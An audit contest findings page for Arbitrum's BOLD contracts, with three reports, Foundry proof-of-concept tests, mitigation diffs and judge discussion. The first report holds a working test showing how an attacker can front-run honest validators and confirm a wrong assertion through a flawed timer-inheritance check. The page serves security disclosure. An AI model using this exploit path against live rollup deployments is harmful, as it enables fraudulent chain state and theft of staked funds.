Platform: Code4rena
Start Date: 10/05/2024
Pot Size: $300,500 USDC
Total HM: 4
Participants: 27
Period: 17 days
Judge: Picodes
Total Solo HM: 1
Id: 375
League: ETH
Rank: 4/27
Findings: 3
Award: $20,529.36
🌟 Selected for report: 1
🚀 Solo Findings: 0
🌟 Selected for report: Kow
Also found by: Emmanuel, SpicyMeatball, xuwinnie
12737.1941 USDC - $12,737.19
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710
An attacker can exploit a vulnerability in the confirmation by time algorithm to confirm incorrect edges, leading to the confirmation of erroneous assertions.
There are two methods available for confirming an edge. Stakers can either bisect the edge until a one-step proof can be obtained and executed, or they can wait until the time threshold has been reached and confirm an unrivaled edge.
The confirmation by time algorithm involves two methods: `updateTimerCacheByChildren` and `updateTimerCacheByClaim`. These methods are responsible for updating the unrivaled time cache of edges in a chain.
```solidity
/// @inheritdoc IEdgeChallengeManager
function multiUpdateTimeCacheByChildren(bytes32[] calldata edgeIds) public {
    for (uint256 i = 0; i < edgeIds.length; i++) {
        (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeIds[i]);
        if (updated) emit TimerCacheUpdated(edgeIds[i], newValue);
    }
}

/// @inheritdoc IEdgeChallengeManager
function updateTimerCacheByChildren(bytes32 edgeId) public {
    (bool updated, uint256 newValue) = store.updateTimerCacheByChildren(edgeId);
    if (updated) emit TimerCacheUpdated(edgeId, newValue);
}
```
If the assertion has edges at multiple levels, each of them must update its unrivaled time cache via `updateTimerCacheByClaim`.
```solidity
/// @inheritdoc IEdgeChallengeManager
function updateTimerCacheByClaim(bytes32 edgeId, bytes32 claimingEdgeId) public {
    (bool updated, uint256 newValue) =
        store.updateTimerCacheByClaim(edgeId, claimingEdgeId, NUM_BIGSTEP_LEVEL);
    if (updated) emit TimerCacheUpdated(edgeId, newValue);
}
```
The algorithm relies on accumulating enough unrivaled time to pass the confirmation threshold.
```solidity
function confirmEdgeByTime(
    EdgeStore storage store,
    bytes32 edgeId,
    uint64 claimedAssertionUnrivaledBlocks,
    uint64 confirmationThresholdBlock
) internal returns (uint256) {
    if (!store.edges[edgeId].exists()) {
        revert EdgeNotExists(edgeId);
    }

    uint256 totalTimeUnrivaled = timeUnrivaledTotal(store, edgeId);
    totalTimeUnrivaled += claimedAssertionUnrivaledBlocks;

>>  if (totalTimeUnrivaled < confirmationThresholdBlock) {
        revert InsufficientConfirmationBlocks(totalTimeUnrivaled, confirmationThresholdBlock);
    }

    // we also check the edge is pending in setConfirmed()
    store.edges[edgeId].setConfirmed();

    // also checks that no other rival has been confirmed
    setConfirmedRival(store, edgeId);

    return totalTimeUnrivaled;
}
```
The issue arises in the `updateTimerCacheByClaim` method, where a "bad" edge can inherit unrivaled time from a "good" edge. This occurs when the function adds the cached time of a lower-level edge to the total unrivaled time of the current edge.
```solidity
function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId,
    uint8 numBigStepLevel
) internal returns (bool, uint256) {
    // calculate the time unrivaled without inheritance
    uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
>>  checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel);
    totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache;
    return updateTimerCache(store, edgeId, totalTimeUnrivaled);
}
```
Let's take a closer look at `checkClaimIdLink`:
```solidity
function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
    private
    view
{
    // we do some extra checks that edge being claimed is eligible to be claimed by the claiming edge
    // these shouldn't be necessary since it should be impossible to add layer zero edges that do not
    // satisfy the checks below, but we conduct these checks anyway for double safety

    // the origin id of an edge should be the mutual id of the edge in the level below
    if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
        revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
    }
    // the claiming edge must be exactly one level below
    if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
        revert EdgeLevelInvalid(
            edgeId,
            claimingEdgeId,
            nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
            store.edges[claimingEdgeId].level
        );
    }
}
```
The validation process ensures that the `claimingEdge` is one layer below `edgeId` and that its `originId` is equal to `edgeId.mutualId()`. However, in the case of rival edges, all of them share the same `originId`, which is equal to the `mutualId` of the higher-level edge. This allows an attacker to exploit the validation by passing a "bad" `edgeId`, which will still pass the check and inherit the cached time from the "good" edge.
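To make the gap concrete, here is a deliberately simplified, self-contained model of the check (hypothetical names and fields, not protocol code). Because rival edges agree on their origin and start but dispute the end state, they share a mutual id, and a link check that only compares the claiming edge's `originId` against that mutual id cannot distinguish between the rivals:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

/// Simplified model of the flawed link check (illustrative, NOT protocol code).
/// Rival edges differ only in their end root, so they share a mutual id; a check
/// that only compares the claiming edge's originId against that mutual id lets
/// either rival absorb the claiming edge's cached timer.
contract ClaimCheckModel {
    struct Edge {
        bytes32 originId;
        bytes32 startRoot;
        bytes32 endRoot; // rivals differ only here
        uint256 timerCache;
    }

    mapping(bytes32 => Edge) internal edges;

    function addEdge(bytes32 id, bytes32 originId, bytes32 startRoot, bytes32 endRoot, uint256 timer) external {
        edges[id] = Edge(originId, startRoot, endRoot, timer);
    }

    // rivals agree on origin and start, so their mutual id is identical
    function mutualId(bytes32 id) public view returns (bytes32) {
        return keccak256(abi.encode(edges[id].originId, edges[id].startRoot));
    }

    // analogue of checkClaimIdLink + updateTimerCacheByClaim: nothing ties the
    // claiming edge to one specific rival, only to the shared mutual id
    function claimTimer(bytes32 edgeId, bytes32 claimingEdgeId) external {
        require(edges[claimingEdgeId].originId == mutualId(edgeId), "bad link");
        edges[edgeId].timerCache += edges[claimingEdgeId].timerCache;
    }
}
```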
To exploit this vulnerability, an attacker can create a "bad" assertion and initiate a dispute between two edges, where one edge is "good" and the other is "bad". After some bisecting and the creation of edges at the new levels, the attacker stops responding, leading honest validators to believe that they can win the dispute by waiting for the confirmation threshold to pass.
Once the confirmation threshold has passed, the attacker, front-running the honest validator, executes a chain of time cache updates starting from the "good" edge. By accumulating time from the "good" edge, the attacker can confirm their "bad" edge and validate the erroneous assertion.
Coded POC for `EdgeChallengeManager.t.sol`:
```solidity
function testCanConfirmByClaimSubChallenge() public {
    EdgeInitData memory ei = deployAndInit();

    (
        bytes32[] memory blockStates1,
        bytes32[] memory blockStates2,
        BisectionChildren[6] memory blockEdges1,
        BisectionChildren[6] memory blockEdges2
    ) = createBlockEdgesAndBisectToFork(
        CreateBlockEdgesBisectArgs(
            ei.challengeManager,
            ei.a1,
            ei.a2,
            ei.a1State,
            ei.a2State,
            false,
            a1RandomStates,
            a1RandomStatesExp,
            a2RandomStates,
            a2RandomStatesExp
        )
    );

    BisectionData memory bsbd = createMachineEdgesAndBisectToFork(
        CreateMachineEdgesBisectArgs(
            ei.challengeManager,
            1,
            blockEdges1[0].lowerChildId,
            blockEdges2[0].lowerChildId,
            blockStates1[1],
            blockStates2[1],
            false,
            ArrayUtilsLib.slice(blockStates1, 0, 2),
            ArrayUtilsLib.slice(blockStates2, 0, 2)
        )
    );

    BisectionData memory ssbd = createMachineEdgesAndBisectToFork(
        CreateMachineEdgesBisectArgs(
            ei.challengeManager,
            2,
            bsbd.edges1[0].lowerChildId,
            bsbd.edges2[0].lowerChildId,
            bsbd.states1[1],
            bsbd.states2[1],
            true,
            ArrayUtilsLib.slice(bsbd.states1, 0, 2),
            ArrayUtilsLib.slice(bsbd.states2, 0, 2)
        )
    );

    _safeVmRoll(block.number + challengePeriodBlock);

    BisectionChildren[] memory allWinners =
        concat(concat(toDynamic(ssbd.edges1), toDynamic(bsbd.edges1)), toDynamic(blockEdges1));
    // Bad edges
    BisectionChildren[] memory allLoosers =
        concat(concat(toDynamic(ssbd.edges2), toDynamic(bsbd.edges2)), toDynamic(blockEdges2));

    // Bad validator accumulates time for good edges
    ei.challengeManager.updateTimerCacheByChildren(allWinners[0].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[0].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[1].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[1].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[2].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[2].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[3].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[3].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[4].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[4].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allWinners[5].lowerChildId);

    // But when moving to another level he claims the timer cache for the bad edge
    ei.challengeManager.updateTimerCacheByClaim(allLoosers[6].lowerChildId, allWinners[5].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[6].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[7].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[8].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[9].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[10].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[11].lowerChildId);
    ei.challengeManager.updateTimerCacheByClaim(allLoosers[12].lowerChildId, allLoosers[11].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[12].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[13].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[14].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[15].upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(allLoosers[16].upperChildId);

    // Bad edge won the dispute by time
    ei.challengeManager.confirmEdgeByTime(allLoosers[17].lowerChildId, ei.a1Data);

    assertTrue(
        ei.challengeManager.getEdge(allLoosers[17].lowerChildId).status == EdgeStatus.Confirmed,
        "Edge confirmed"
    );
}
```
Tools used: Foundry
One of the steps to prevent this vulnerability would be to validate the `claimId` in the `checkClaimIdLink` function, so that only the edge the claiming edge was actually created against can inherit its cached time.
```diff
 function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
     private
     view
 {
     if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
         revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
     }
     // the claiming edge must be exactly one level below
     if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
         revert EdgeLevelInvalid(
             edgeId,
             claimingEdgeId,
             nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
             store.edges[claimingEdgeId].level
         );
     }
+    // the claiming edge claimId must be the edgeId
+    if (store.edges[claimingEdgeId].claimId != edgeId) {
+        revert ClaimIdInvalid();
+    }
 }
```
Assessed type: Invalid Validation
#0 - c4-judge
2024-06-03T22:30:30Z
Picodes marked the issue as satisfactory
🌟 Selected for report: SpicyMeatball
Also found by: dontonka, josephdara
7792.1658 USDC - $7,792.17
An error in the `BOLDUpgradeAction.sol` contract prevents it from upgrading and deploying new BOLD contracts.

The `perform` function serves as the entry point in `BOLDUpgradeAction.sol` and is responsible for migrating stakers from the old rollup and deploying the challenge manager with a new rollup contract.

One of the first subroutines called in this function is `cleanupOldRollup()`.
```solidity
function perform(address[] memory validators) external {
    // tidy up the old rollup - pause it and refund stakes
    cleanupOldRollup();
```
This subroutine pauses the old rollup contract and attempts to refund existing stakers.
```solidity
function cleanupOldRollup() private {
    IOldRollupAdmin(address(OLD_ROLLUP)).pause();

>>  uint64 stakerCount = ROLLUP_READER.stakerCount();
    // since we for-loop these stakers we set an arbitrary limit - we dont
    // expect any instances to have close to this number of stakers
    if (stakerCount > 50) {
        stakerCount = 50;
    }
    for (uint64 i = 0; i < stakerCount; i++) {
>>      address stakerAddr = ROLLUP_READER.getStakerAddress(i);
        OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
        if (staker.isStaked && staker.currentChallenge == 0) {
            address[] memory stakersToRefund = new address[](1);
            stakersToRefund[0] = stakerAddr;

            IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
        }
    }

    // upgrade the rollup to one that allows validators to withdraw even whilst paused
    DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
}
```
This function contains a bug that prevents execution of the subsequent procedures. Let's check `forceRefundStaker` in the old rollup contract.
According to https://docs.arbitrum.io/build-decentralized-apps/reference/useful-addresses:

Proxy: https://etherscan.io/address/0x5eF0D09d1E6204141B4d37530808eD19f60FBa35
Implementation: https://etherscan.io/address/0x72f193d0f305f532c87a4b9d0a2f407a3f4f585f#code
RollupAdminLogic.sol
```solidity
function forceRefundStaker(address[] calldata staker) external override whenPaused {
    require(staker.length > 0, "EMPTY_ARRAY");
    for (uint256 i = 0; i < staker.length; i++) {
        require(_stakerMap[staker[i]].currentChallenge == NO_CHAL_INDEX, "STAKER_IN_CHALL");
        reduceStakeTo(staker[i], 0);
>>      turnIntoZombie(staker[i]);
    }
    emit OwnerFunctionCalled(22);
}
```
RollupCore.sol
```solidity
function turnIntoZombie(address stakerAddress) internal {
    Staker storage staker = _stakerMap[stakerAddress];
    _zombies.push(Zombie(stakerAddress, staker.latestStakedNode));
>>  deleteStaker(stakerAddress);
}

function deleteStaker(address stakerAddress) private {
    Staker storage staker = _stakerMap[stakerAddress];
    require(staker.isStaked, "NOT_STAKED");
    uint64 stakerIndex = staker.index;
    _stakerList[stakerIndex] = _stakerList[_stakerList.length - 1];
    _stakerMap[_stakerList[stakerIndex]].index = stakerIndex;
>>  _stakerList.pop();
    delete _stakerMap[stakerAddress];
}
```
From the above code, it is evident that the staker's address is eventually deleted from `_stakerList`, causing the array to shrink. As a result, the `cleanupOldRollup` function will throw an "array out-of-bounds" error because it tries to iterate through the array using the original number of elements.
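A minimal, self-contained sketch of this failure mode (hypothetical list and names, not protocol code) shows why iterating with a count cached before the loop breaks once entries are swap-and-popped out of the list:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

/// Illustration only: the loop bound is cached before the loop, while every
/// "refund" swap-and-pops an entry out of the list, so later indices no longer
/// exist and the read reverts with an "array out-of-bounds access" panic.
contract ShrinkingListDemo {
    address[] internal stakerList;
    mapping(address => uint256) internal indexOf;

    constructor() {
        for (uint160 i = 1; i <= 3; i++) {
            indexOf[address(i)] = stakerList.length;
            stakerList.push(address(i));
        }
    }

    // same swap-and-pop removal pattern as deleteStaker in RollupCore
    function refund(address stakerAddr) internal {
        uint256 idx = indexOf[stakerAddr];
        stakerList[idx] = stakerList[stakerList.length - 1];
        indexOf[stakerList[idx]] = idx;
        stakerList.pop();
        delete indexOf[stakerAddr];
    }

    function cleanup() external {
        uint256 count = stakerList.length; // cached once, like stakerCount in cleanupOldRollup
        for (uint256 i = 0; i < count; i++) {
            address stakerAddr = stakerList[i]; // panics once i >= stakerList.length
            refund(stakerAddr);                 // list shrinks on every iteration
        }
    }
}
```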
Coded POC: here we use a mainnet fork with only the `cleanupOldRollup` function.
```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

import {Test} from "forge-std/Test.sol";
import "forge-std/console.sol";

struct OldStaker {
    uint256 amountStaked;
    uint64 index;
    uint64 latestStakedNode;
    // currentChallenge is 0 if staker is not in a challenge
    uint64 currentChallenge; // 1. cannot have current challenge
    bool isStaked; // 2. must be staked
}

interface IOldRollup {
    function pause() external;
    function forceRefundStaker(address[] memory stacker) external;
    function getStakerAddress(uint64 stakerNum) external view returns (address);
    function stakerCount() external view returns (uint64);
    function getStaker(address staker) external view returns (OldStaker memory);
}

contract C4 is Test {
    IOldRollup oldRollup;
    address admin;

    function setUp() public {
        uint256 forkId = vm.createFork("https://rpc.ankr.com/eth");
        vm.selectFork(forkId);
        oldRollup = IOldRollup(0x5eF0D09d1E6204141B4d37530808eD19f60FBa35);
        admin = 0x3ffFbAdAF827559da092217e474760E2b2c3CeDd;
    }

    function test_Cleanup() public {
        vm.startPrank(admin);
        oldRollup.pause();
        uint64 stakerCount = oldRollup.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            // FAILS with panic: array out-of-bounds access
            address stakerAddr = oldRollup.getStakerAddress(i);
            OldStaker memory staker = oldRollup.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;
                oldRollup.forceRefundStaker(stakersToRefund);
            }
        }
    }
}
```
Tools used: Foundry
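A possible fix is to advance the loop index only when the current staker is not refunded: since `forceRefundStaker` swap-and-pops the refunded entry out of `_stakerList`, the last staker moves into slot `i` and the number of remaining entries shrinks by one. For example: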
```diff
 function cleanupOldRollup() private {
     IOldRollupAdmin(address(OLD_ROLLUP)).pause();

     uint64 stakerCount = ROLLUP_READER.stakerCount();
     // since we for-loop these stakers we set an arbitrary limit - we dont
     // expect any instances to have close to this number of stakers
     if (stakerCount > 50) {
         stakerCount = 50;
     }
-    for (uint64 i = 0; i < stakerCount; i++) {
+    for (uint64 i = 0; i < stakerCount;) {
         address stakerAddr = ROLLUP_READER.getStakerAddress(i);
         OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
         if (staker.isStaked && staker.currentChallenge == 0) {
             address[] memory stakersToRefund = new address[](1);
             stakersToRefund[0] = stakerAddr;

             IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
+            stakerCount -= 1;
-        }
+        } else {
+            i++;
+        }
     }
```
Assessed type: DoS
#0 - c4-sponsor
2024-05-31T19:07:39Z
godzillaba (sponsor) confirmed
#1 - gzeoneth
2024-06-03T16:21:21Z
#2 - c4-judge
2024-06-04T22:15:42Z
Picodes marked the issue as satisfactory
#3 - c4-judge
2024-06-04T22:18:57Z
Picodes marked the issue as selected for report
#4 - Picodes
2024-06-04T22:19:16Z
Keeping this report as best, as the mitigation takes into account the `if` condition.
🌟 Selected for report: Sathish9098
Also found by: Audinarey, Dup1337, K42, KupiaSec, LessDupes, Rhaydden, SpicyMeatball, Takarez, ZanyBonzy, bronze_pickaxe, carlitox477, dontonka, forgebyola, fyamf, guhu95, hihen, josephdara, ladboy233, slvDev, twcctop, xuwinnie, zanderbyte
0 USDC - $0.00
If a wrong assertion is created in the rollup contract, calling `forceCreateAssertion` will not transfer the "bad" assertion's stake to the `loserStakeEscrow`; instead, it will remain in the rollup contract forever.

The rollup contract assumes that there can only be one correct assertion. Therefore, it transfers all subsequent stakes into the `loserStakeEscrow`, since "bad" assertion stakers cannot withdraw.
```solidity
function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
    public
    onlyValidator
    whenNotPaused
{
    ---SNIP---
    if (!getAssertionStorage(newAssertionHash).isFirstChild) {
        // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
        // only 1 of the children can be confirmed and get their stake refunded
        // so we send the other children's stake to the loserStakeEscrow
        // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>      IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
    }
}
```
However, in one case, this doesn't happen. Consider the following scenario:
1. Alice stakes on an incorrect assertion.
2. The rollup is paused and the admin calls `forceCreateAssertion` to create a correct assertion and confirms it with `forceConfirmAssertion`.

```solidity
function forceCreateAssertion(
    bytes32 prevAssertionHash,
    AssertionInputs calldata assertion,
    bytes32 expectedAssertionHash
) external override whenPaused {
    // To update the wasm module root in the case of a bug:
    // 0. pause the contract
    // 1. update the wasm module root in the contract
    // 2. update the config hash of the assertion after which you wish to use the new wasm module root (functionality not written yet)
    // 3. force refund the stake of the current leaf assertion(s)
    // 4. create a new assertion using the assertion with the updated config has as a prev
    // 5. force confirm it - this is necessary to set latestConfirmed on the correct line
    // 6. unpause the contract

    // Normally, a new assertion is created using its prev's confirmPeriodBlocks
    // in the case of a force create, we use the rollup's current confirmPeriodBlocks
>>  createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);

    emit OwnerFunctionCalled(23);
}

function forceConfirmAssertion(
    bytes32 assertionHash,
    bytes32 parentAssertionHash,
    AssertionState calldata confirmState,
    bytes32 inboxAcc
) external override whenPaused {
    // this skip deadline, prev, challenge validations
    confirmAssertionInternal(assertionHash, parentAssertionHash, confirmState, inboxAcc);
    emit OwnerFunctionCalled(24);
}
```
Note that the funds are not transferred to the escrow, even though the forced assertion is a second child. The `forceCreateAssertion` comments mention a force refund of the stakers, but Alice can't be refunded due to the `requireInactiveStaker` condition. As a result, Alice's stake will be stuck in the rollup contract.
There is a function called `fastConfirmNewAssertion`, similar to `forceCreateAssertion`, which includes the transfer of stake in case the new assertion is a second child.
```solidity
function fastConfirmNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
    external
    whenNotPaused
{
    ---SNIP---
    if (status == AssertionStatus.NoAssertion) {
        // If not exists, we create the new assertion
        (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash);
        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>          IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }
    }
```
Tools used: Manual review
Consider transferring tokens to the loser escrow in `forceCreateAssertion`, like it's done in the `fastConfirmNewAssertion` function.
```diff
 function forceCreateAssertion(
     bytes32 prevAssertionHash,
     AssertionInputs calldata assertion,
     bytes32 expectedAssertionHash
 ) external override whenPaused {
-    createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);
+    (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);
+    if (!getAssertionStorage(newAssertionHash).isFirstChild) {
+        IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
+    }

     emit OwnerFunctionCalled(23);
 }
```
Assessed type: Other
#0 - gzeoneth
2024-05-31T19:50:21Z
> // 4. create a new assertion using the assertion with the updated config has as a prev

The `assertion with updated config` is referring to Alice's assertion (leaf assertion, without child); when this new assertion is created, Alice's assertion will become inactive as it now has a child.

There is a documentation error with steps (3) and (4) inverted, but it has no impact on the protocol.
#1 - c4-judge
2024-06-05T09:03:21Z
Picodes marked the issue as unsatisfactory: Invalid
#2 - k4zanmalay
2024-06-05T20:12:43Z
In this report it is implied that Alice is the bad actor, so her assertion should never have a child. In the scenario where we have a chain of good assertions, Alice creates an incorrect one:

```
Good--->Good--->Bad(Alice)
```

Then `ForceCreateAssertion` is called:

```
Good--->Good--->Bad(Alice)
            \--->Good(Force created)
```

In this situation Alice's stake will be left in the rollup contract forever instead of being transferred to the escrow.
#3 - xuwinnie
2024-06-06T00:19:17Z
Hey, I have some thoughts on this. There are two possibilities.
#4 - k4zanmalay
2024-06-06T06:23:06Z
Why do we need to confirm the bad assertion? The prev assertion has two children: Alice (bad) and Force created (good). In all other cases, like assertion creation by the validator/user and `fastConfirmNewAssertion`, if the prev hash already has one child, assets are transferred into the escrow because there can only be one true assertion, see:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L210-L216
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L288-L295

I see no reason why this shouldn't be implemented in the case of `forceCreateAssertion`.
So in your case:

`requireInactiveStaker` so we are safe

#5 - xuwinnie
2024-06-06T06:27:34Z
Under normal circumstances we will never use this functionality. There must be either a soundness bug or a completeness bug. As I have said, in possibility 1, implementing it will cause insolvency. Yes, the bad assertion should not be confirmed, but only when it IS confirmed will we call this function. Alice could have already withdrawn since the wrong assertion won the challenge. Otherwise, we don't need to call force confirm in possibility 2; we should directly refund instead of sending to the `loserStakeEscrow`.
#6 - k4zanmalay
2024-06-06T06:35:14Z
Why are you implying that the wrong assertion has won the challenge? It hasn't, it just sits there :)
#7 - xuwinnie
2024-06-06T06:36:50Z
If it does not win, why do we need to call the admin function? The admin function is intended to be used when a bug occurs. To put it simply, when we wish to call these admin functions, it's very likely that `latestConfirmed` contains a bug, and we need to force switch to `latestConfirmed`'s cousin. But `latestConfirmed` has already been confirmed (and potentially withdrawn), so we don't transfer once more.
#8 - k4zanmalay
2024-06-06T06:40:26Z
This may be another bug unrelated to Alice's assertion. Let's wait for comments from devs.
#9 - gzeoneth
2024-06-06T11:22:24Z
> In this report it is implied that Alice is the bad actor, so her assertion should never have a child. In the scenario where we have a chain of good assertions, Alice creates an incorrect one:
>
> ```
> Good--->Good--->Bad(Alice)
> ```
>
> Then `ForceCreateAssertion` is called:
>
> ```
> Good--->Good--->Bad(Alice)
>             \--->Good(Force created)
> ```
>
> In this situation Alice's stake will be left in the rollup contract forever instead of being transferred to the escrow.
Typically, if Alice is malicious, her assertion should have at least 1 sibling assertion, e.g.

```
Good--->Good--->Bad(Alice)
            \--->Good(Bob, normally created)
```

When Bob is created, 1 stake would have been sent to the loser escrow and the stake invariant holds. Sure, it is possible for another bug to prevent Bob from being created, but the worst case here is Alice's malicious stake being temporarily stuck in the rollup contract, where the impact is quite low.

As with everything in `RollupAdminLogic`, these are highly trusted admin actions and are known to be capable of breaking protocol invariants. In a scenario where there is a critical bug in the contract, there is no trivial handling of stake possible, and we expect any inconsistent state to be resolved by a contract upgrade.
#10 - k4zanmalay
2024-06-06T12:11:38Z
@gzeoneth thanks for the clarification, but why does `fastConfirmNewAssertion` (I think it is somewhat similar to `forceCreateAssertion`, except that `anyTrustFastConfirmer` has less power than the rollup admin) send stakes to the escrow if there is a child in the parent hash?
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L288-L295
Why not implement the same mechanism in `forceCreateAssertion`?
#11 - gzeoneth
2024-06-06T12:44:31Z
Correct, `anyTrustFastConfirmer` has less power and `fastConfirmNewAssertion` is expected to be called more frequently, whereas `forceCreateAssertion` is not.
#12 - Picodes
2024-06-09T18:37:29Z
This report shows how, when there is an emergency action by a highly privileged role, the handling of the stake is nontrivial. However, considering we are in an edge case where invariants don't hold, I don't think we can consider this a loss of funds or broken functionality, so QA severity seems more appropriate.
#13 - c4-judge
2024-06-09T18:37:34Z
Picodes removed the grade
#14 - c4-judge
2024-06-09T18:37:39Z
Picodes changed the severity to QA (Quality Assurance)
#15 - DecentralDisco
2024-06-11T21:02:28Z
Noting that the 'grade-a' label was added on behalf of the judge after receiving confirmation.